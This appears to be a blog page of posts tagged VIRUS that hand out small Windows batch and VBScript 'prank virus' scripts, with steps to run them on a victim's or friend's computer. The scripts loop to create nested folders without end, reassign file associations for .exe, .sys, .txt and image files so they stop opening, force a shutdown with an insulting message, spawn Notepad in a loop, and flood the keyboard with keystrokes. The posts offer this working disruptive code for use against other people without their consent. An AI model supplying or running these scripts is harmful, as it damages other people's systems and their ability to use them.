Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Folder Replicator Batch virus

Today i gonna show you how to make a batch file that creates a folder inside a folder & so on..

I know all of them are interested in making virus so once again i came up with new virus(not a virus but it's a batch file).

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.


1. Just open up a notepad, copy and paste the below code

cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2. Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

Feel free to share your fellings in comments.. : )









Ext_change Virus


Here in this article i came with Extension changer virus today i am gonna showing you how to change an Extension of an files.

What is Extension changer ?

Assume that all images (*.jpeg, Gif etc) are by default opening with "Windows Picture and Fax Viewer" but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.

1. Open a Notepad and copy and paste the below code

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

2. Save it as extension.bat, and now you are ready to go…

3. Execute this on Victims computer

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…

The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….


Pass your comments about this article..

Virus writing code..!!

friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya it's acts like a virus but not virus it's a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus don't worry it doesn't effect your PC.

Ok the below are the codes of Virus like acting.

* Convey your friend a lil' message and shut down his / her computer:

Type in notepad:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.


* Open Notepad continually in your friend's computer:

Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.


* Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Save it as "Anything.VBS" and send it.

* Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.


All this works until system will restart so don't worry
.


Please leave your comment ... i love comments
.